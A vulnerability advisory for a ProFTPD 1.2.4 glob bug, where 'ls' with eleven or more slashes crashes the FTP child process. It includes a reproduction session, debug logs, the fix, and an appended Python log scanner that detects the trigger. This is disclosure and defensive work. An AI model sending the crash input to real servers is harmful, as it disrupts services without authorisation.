A problem in handling file globbing exists in the current version of ProFTPD, 1.2.4. It is very similar to the wu-ftpd bug ("ls ~{") and occurs when you issue the command: ls /////////// (11 or more '/').
Credit:
The information has been provided by Mattias _.
Vulnerable systems:
ProFTPD 1.2.4
ProFTPD 1.2.2rc3
Immune systems:
ProFTPD 1.2.5rc1
Impact:
The ftpd-child dies with signal 11 (SEGV), but the server stays up.
A segmentation fault occurs when the server tries to free unallocated memory with free(), and it could be a heap corruption vulnerability. The SEGV occurs in the function void globfree (pglob) in the file lib/glibc-glob.c.
Recreate:
Log in as ftp (anonymous) and issue the command:
ftp> ls ///////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp>
The debug messages read (proftpd -n -d 5):
dispatching PRE_CMD command 'LIST ///////////' to mod_core
dispatching CMD command 'LIST ///////////' to mod_ls
active data connection opened - local : 127.0.0.1:20
active data connection opened - remote : 127.0.0.1:1286
in dir_check_full(): path = '/', fullpath = '/home/ftp/'.
ProFTPD terminating (signal 11)
Solution:
Upgrade to version 1.2.5rc1.
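
The crash sequence in the debug output above can be matched mechanically on servers that log at this debug level. The following Python example is added here and is not part of the original advisory or of ProFTPD; it assumes a single-session debug stream in the format quoted above, the sample lines are constructed, and the name scan is hypothetical. It goes slightly beyond the advisory by flagging any dispatched command whose argument contains the slash run, not only LIST.

```python
import re

SLASH_RUN = 11  # advisory: 11 or more '/' in the command argument
CMD_RE = re.compile(r"dispatching CMD command '(\w+)(?: ([^']*))?' to \S+")
TERM_RE = re.compile(r"ProFTPD terminating \(signal (\d+)\)")

# Constructed sample lines, modelled on the debug output quoted above.
SLASHES = "/" * SLASH_RUN
SAMPLE_LOG = [
    "dispatching PRE_CMD command 'LIST /pub' to mod_core",
    "dispatching CMD command 'LIST /pub' to mod_ls",
    "dispatching PRE_CMD command 'LIST %s' to mod_core" % SLASHES,
    "dispatching CMD command 'LIST %s' to mod_ls" % SLASHES,
    "active data connection opened - local : 127.0.0.1:20",
    "in dir_check_full(): path = '/', fullpath = '/home/ftp/'.",
    "ProFTPD terminating (signal 11)",
]


def scan(lines, slash_run=SLASH_RUN):
    """Flag commands whose argument has a long '/' run; note a following SEGV."""
    run_re = re.compile("/{%d,}" % slash_run)
    findings, pending = [], None
    for lineno, line in enumerate(lines, 1):
        cmd = CMD_RE.search(line)
        if cmd:
            # A new command ends the window in which a crash is attributed.
            pending = None
            arg = cmd.group(2) or ""
            if run_re.search(arg):
                pending = {"line": lineno, "verb": cmd.group(1),
                           "arg": arg, "crashed": False}
                findings.append(pending)
            continue
        term = TERM_RE.search(line)
        # Only signal 11 directly after a flagged command counts as the crash.
        if term and pending and term.group(1) == "11":
            pending["crashed"] = True
            pending = None
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with crashed set to True means the child process died on the flagged command; crashed False means the pattern was seen but no signal 11 followed before the next command.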